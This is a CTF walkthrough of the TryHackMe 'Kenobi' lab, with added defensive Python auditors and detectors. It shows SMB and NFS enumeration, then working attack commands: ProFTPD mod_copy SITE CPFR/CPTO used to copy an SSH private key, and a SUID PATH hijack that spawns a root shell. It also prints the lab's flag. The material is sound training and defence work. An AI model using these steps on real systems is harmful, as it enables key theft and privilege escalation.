Kenobi

David Kennedy
5 min read · Nov 7, 2021

Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation. — via TryHackMe.

via — eranico.com

Task 1: Deploy the vulnerable machine

#1 Make sure you’re connected to our network and deploy the machine

No answer needed.

#2 Scan the machine with nmap. How many ports are open?

export ip=10.10.64.233 ; nmap $ip

7

Task 2: Enumerating Samba for shares

Using nmap we can enumerate a machine for SMB shares.

Nmap has the ability to automate a wide variety of networking tasks. There is a script to enumerate shares:

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse $ip

#1 Using the nmap command above, how many shares have been found?

3

#2 Once you’re connected, list the files on the share. What file can you see?

To connect:

smbclient //$ip/anonymous

To list:

ls

log.txt

You can recursively download the SMB share too. Leave the username and password empty when prompted. I was unable to use $ip here:

smbget -R smb://10.10.64.233/anonymous

Inspect the log.txt file:

more log.txt

#3 What port is FTP running on?

The log.txt file contains the FTP server’s configuration, including the port it listens on, which is the standard FTP port.

The initial nmap port scan will have shown port 111 running the service rpcbind. This is a server that converts remote procedure call (RPC) program numbers into universal addresses. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number it’s prepared to serve.

In this case, port 111 gives access to a network file system (NFS). Let’s use nmap to enumerate this port:

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.64.233

#4 What mount can we see?

/var
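The exposed /var export is exactly what a defender would want to catch before an attacker enumerates it. As an added example that is not part of the original write-up, here is a small Python audit of an /etc/exports file, run over a constructed sample (the export options shown are assumptions, not the target machine’s configuration). It flags exports open to any host, writable exports, and no_root_squash.

```python
import re

# Constructed sample /etc/exports (not the target machine's real file).
SAMPLE_EXPORTS = """\
# constructed example
/var *(rw,sync,no_root_squash)
/srv/share 10.0.0.0/24(ro,sync)
/home 192.168.1.50
"""

# Export options worth a finding, with the reason a reviewer would give.
RISKY_OPTIONS = {
    "no_root_squash": "remote root keeps uid 0 on this export",
    "rw": "export is writable",
    "insecure": "requests from unprivileged source ports are accepted",
}

# A client spec looks like "host(opt,opt)", "host" or "(opt)".
SPEC_RE = re.compile(r"([^(]*)(?:\((.*)\))?")


def parse_exports(text):
    """Return [(path, [(client, set_of_options), ...]), ...] for each export line."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        path, clients = parts[0], []
        for spec in parts[1:]:
            m = SPEC_RE.fullmatch(spec)
            if m is None:
                continue
            client = m.group(1) or "*"          # "(rw)" with no host means every host
            opts = set(filter(None, (m.group(2) or "").split(",")))
            clients.append((client, opts))
        if not clients:                          # a bare path is exported to everyone
            clients.append(("*", set()))
        entries.append((path, clients))
    return entries


def audit_exports(text):
    """Return (path, client, reason) findings for risky export entries."""
    findings = []
    for path, clients in parse_exports(text):
        for client, opts in clients:
            if client == "*" or client.startswith("*."):
                findings.append((path, client, "any host may mount this export"))
            for opt, reason in RISKY_OPTIONS.items():
                if opt in opts:
                    findings.append((path, client, reason))
    return findings


if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print("%s exported to %s: %s" % finding)
```

On a real host, pass the contents of /etc/exports to audit_exports(); an export like the /var line in the sample is the one that lets an unauthenticated client read whatever lands in /var/tmp.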

Task 3: Gain initial access with ProFtpd

ProFtpd is a free and open-source FTP server, compatible with Unix and Windows systems. Past versions of the software have also been vulnerable.

#1 Let’s get the version of ProFtpd. Use netcat to connect to the machine on the FTP port. What is the version?

netcat 10.10.64.233 21

1.3.5

#2 How many exploits are there for the ProFTPd version running?

We can use searchsploit to find exploits for a particular software version:

searchsploit proftpd | grep 1.3

1.3.5 - 'mod_copy' Command Execution (Metasploit)
1.3.5 - 'mod_copy' Remote Command Execution
1.3.5 - File Copy
1.3.x - Remote Command Execution

4

You should have found an exploit from ProFtpd’s mod_copy module.

The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.

We know that the FTP service is running as the Kenobi user (from the log.txt file on the share) and that an SSH key has been generated for that user.

We’re now going to copy Kenobi’s private key using the SITE CPFR and SITE CPTO commands:

nc $ip 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

We already knew that the /var directory was an NFS mount we could see, so we’ve now copied Kenobi’s private key into the /var/tmp directory.
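From the defender’s side, the CPFR/CPTO pair described above is easy to spot in the FTP server’s command log. The following Python detector is an added example, not part of the original write-up: the log line layout (timestamp, client IP, user, quoted raw command) and the FTP root /srv/ftp are assumptions, and the log lines are constructed. It pairs each client’s SITE CPFR with the following SITE CPTO and alerts when either path resolves outside the FTP root.

```python
import posixpath
import re

# Constructed FTP command-log lines: timestamp, client IP, user, quoted raw
# command. The layout is an assumption for this example, not ProFTPD's default.
SAMPLE_LOG = """\
2021-11-07 10:12:01 10.10.14.5 anonymous "USER anonymous"
2021-11-07 10:12:02 10.10.14.5 anonymous "SITE CPFR /home/kenobi/.ssh/id_rsa"
2021-11-07 10:12:03 10.10.14.5 anonymous "SITE CPTO /var/tmp/id_rsa"
2021-11-07 10:15:10 10.10.14.9 alice "SITE CPFR /srv/ftp/report.pdf"
2021-11-07 10:15:11 10.10.14.9 alice "SITE CPTO /srv/ftp/archive/report.pdf"
"""

LINE_RE = re.compile(r'^(\S+ \S+) (\S+) (\S+) "(.*)"$')
FTP_ROOT = "/srv/ftp"  # assumed document root of the FTP server


def parse_line(line):
    """Split one log line into its fields, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, user, cmd = m.groups()
    return {"ts": ts, "client": client, "user": user, "cmd": cmd}


def outside_root(path, ftp_root):
    """True when the normalised path does not live under ftp_root."""
    norm = posixpath.normpath(path)
    return not (norm == ftp_root or norm.startswith(ftp_root.rstrip("/") + "/"))


def find_copy_abuse(log_text, ftp_root=FTP_ROOT):
    """Pair each client's SITE CPFR with its SITE CPTO and alert when either
    side of the copy resolves outside the FTP root."""
    pending = {}  # client IP -> source path from the last CPFR
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = rec["cmd"].split(None, 2)
        if len(parts) < 3 or parts[0].upper() != "SITE":
            continue
        sub, arg = parts[1].upper(), parts[2]
        if sub == "CPFR":
            pending[rec["client"]] = arg
        elif sub == "CPTO":
            src = pending.pop(rec["client"], None)
            bad = [posixpath.normpath(p) for p in (src, arg)
                   if p and outside_root(p, ftp_root)]
            if bad:
                alerts.append({
                    "ts": rec["ts"], "client": rec["client"], "user": rec["user"],
                    "anonymous": rec["user"] == "anonymous",
                    "src": src, "dst": arg, "outside_root": bad,
                })
    return alerts


if __name__ == "__main__":
    for alert in find_copy_abuse(SAMPLE_LOG):
        print(alert)
```

Paths are normalised before the root check so a source such as /srv/ftp/../../etc/passwd is still flagged; the anonymous field is there because an unauthenticated session issuing SITE commands at all is the signal that matters most here.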

Let’s mount the /var directory (which contains /var/tmp) on our machine:

mkdir /mnt/kenobiNFS
mount machine_ip:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS

We now have a network mount of the deployed machine’s /var directory! We can go to /var/tmp, get the private key and then log in to Kenobi’s account.

cp /mnt/kenobiNFS/tmp/id_rsa .
sudo chmod 600 id_rsa
ssh -i id_rsa kenobi@10.10.120.253
ls -al
more user.txt

Task 4: Privilege Escalation with Path Variable Manipulation

SUID bits can be dangerous. Some binaries, such as passwd, need to run with elevated privileges (as they reset your password on the system), but other custom files that have the SUID bit set can lead to all sorts of issues.

To search a system for these types of files, run the following:

find / -perm -u=s -type f 2>/dev/null

#1 What file looks particularly out of the ordinary?

/usr/bin/menu

#2 Run the binary. How many options appear?

/usr/bin/menu

3

Strings is a command on Linux that looks for human-readable strings in a binary.

strings /usr/bin/menu

This shows us that the binary runs commands without a full path (e.g. curl and uname rather than /usr/bin/curl or /usr/bin/uname).

As this file runs with the root user’s privileges, we can manipulate our PATH to gain a root shell.

cd ..
cd tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menu

We created a file called curl that runs /bin/sh, gave it the correct permissions and then put its location at the front of our PATH. This meant that when the /usr/bin/menu binary was run, it used our PATH variable to find the “curl” binary, which is actually /bin/sh. As the menu binary runs as root, it runs our shell as root.

whoami
cd /root
ls -al
more root.txt

#3 What is the root flag (/root/root.txt)?

177b3cd8562289f37382721c28381f02
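The weakness that makes the PATH trick work is a privileged program invoking commands by bare name. As an added example (not part of the original write-up), here is a Python audit that mimics the strings check above and flags watched command names that appear without an absolute path inside SUID binaries; the SAMPLE_BINARY bytes and the WATCHED_COMMANDS list are constructed assumptions, not the real menu binary.

```python
import os
import re
import stat

# Command names that a privileged helper commonly shells out to. This list is
# an assumption for the example; extend it for your environment.
WATCHED_COMMANDS = {"curl", "uname", "ifconfig", "ip", "cat", "ls", "sh", "bash"}

# Constructed byte blob standing in for the contents of a SUID binary such as
# the menu program in the write-up (not the real file).
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"curl -I localhost\x00"        # relative: resolved through PATH
    + b"/usr/bin/uname -r\x00"        # absolute: safe from PATH hijacking
    + b"ifconfig\x00"                 # relative: resolved through PATH
    + b"1. status check\x00"
)


def extract_strings(blob, min_len=4):
    """Roughly what strings(1) does: runs of printable ASCII of at least min_len bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def relative_commands(strings, watched=WATCHED_COMMANDS):
    """Return watched command names that appear as the first word of a string
    without a leading slash, i.e. invocations the shell resolves via PATH."""
    hits = []
    for s in strings:
        words = s.split()
        if not words or words[0].startswith("/"):
            continue
        if words[0] in watched:
            hits.append(words[0])
    return hits


def audit_suid_file(path, watched=WATCHED_COMMANDS):
    """Return flagged command names for one file, or None if it is not SUID."""
    st = os.stat(path)
    if not (st.st_mode & stat.S_ISUID):
        return None
    with open(path, "rb") as f:
        return relative_commands(extract_strings(f.read()), watched)


def audit_tree(root="/"):
    """Walk a filesystem and report SUID files that call watched commands by bare name."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                hits = audit_suid_file(path)
            except OSError:
                continue
            if hits:
                report[path] = sorted(set(hits))
    return report


if __name__ == "__main__":
    print(relative_commands(extract_strings(SAMPLE_BINARY)))  # ['curl', 'ifconfig']
```

Running audit_tree() over a real filesystem needs root to read every SUID file, and a string match is only a lead that still has to be confirmed by reading the program. The fix for a flagged binary is to invoke helpers by absolute path, or to set PATH to a fixed trusted value before any system() call, so a writable directory at the front of the caller’s PATH no longer decides what runs as root.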
